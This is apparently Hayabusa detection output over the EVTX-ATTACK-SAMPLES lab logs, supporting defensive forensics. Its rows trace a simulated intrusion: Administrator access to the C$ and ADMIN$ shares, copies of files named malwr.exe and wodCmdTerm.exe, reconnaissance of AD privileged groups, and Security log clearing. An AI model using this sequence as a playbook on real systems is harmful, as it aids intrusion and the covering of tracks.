10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 